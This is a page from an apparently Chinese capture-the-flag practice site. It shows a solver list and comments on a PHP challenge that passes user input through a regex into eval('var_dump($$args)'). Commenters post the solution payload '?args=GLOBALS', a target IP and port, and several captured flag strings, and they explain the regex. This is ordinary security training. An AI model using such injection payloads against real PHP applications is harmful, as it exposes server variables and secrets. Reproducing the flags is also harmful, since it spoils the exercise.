评分(16)
解题动态
阿杰学网安 攻破了该题 56分钟前
孙12138 攻破了该题 1小时前
jwz 攻破了该题 5小时前
来来来 攻破了该题 6小时前
胡look 攻破了该题 6小时前
SQZ 攻破了该题 6小时前
lcjvfyhnv 攻破了该题 6小时前
jayk 攻破了该题 6小时前
秋月初冻 攻破了该题 6小时前
chaojidajiji 攻破了该题 6小时前
Aolodld 攻破了该题 6小时前
肖木銮 攻破了该题 6小时前
千万 攻破了该题 6小时前
gfh 攻破了该题 6小时前
Xb123aaa 攻破了该题 7小时前
MK 攻破了该题 7小时前
hz171 攻破了该题 8小时前
Cipher07 攻破了该题 17小时前
qydy 攻破了该题 18小时前
评论
3166235571 2年前
举报
if(!preg_match("/^\w+$/",$args)){ // 正则表达式的意思是匹配任意 [A-Za-z0-9_] 的字符,就是任意大小写字母和0到9以及下划线组成 die("args error!"); } eval("var_dump($$args);
哥哥 2年前
举报
http://114.67.175.224:18582/?args=GLOBALS flag{60729e319d957a46aa93c8297eea6108}
EtHat 2年前
举报
/?args=_SERVER
鸡你太美 2年前
举报
使用?args=GLOBALS以字典类型返回当前位置的全部全局变量。 得到flag{c94e74f9465ed5564d0f1047b3da021c}
jamin 2年前
举报
@asd+1024 GLOBAL会被正则表达式匹配,但是正则匹配前面还有"!",取反了,所以if不执行
ts4win 2年前
举报
@LP_joker + 表示匹配前面的模式一次或多次,并不是加上数字
LP_joker 2年前
举报
@asd+1024 ^\w+$表示匹配“大小写字母+数字” GLOSBALS只有字母
asd+1024 2年前
举报
可是,为什么GLOBAL不会被正则表达式匹配啊,大佬能讲讲吗
coo1an 2年前
举报
/?args=GLOBALS
大哥大 2年前
举报
?args=GLOBALS即可得到flag
chushou 2年前
举报
了解 preg_match()函数,预变量GLOBALS。让参数args=GLOBALS就可以得到flag
movieatravelover 2年前
举报
flag{ea4e336dbeb0a5cf5400ee29f2ca93fc}
107zsm 2年前
举报
靶机地址+?args=GLOBALS即可得到flag
shiqinannan 2年前
举报
当args参数为GLOBALS时,满足正则表达式要求,eval语句将被执行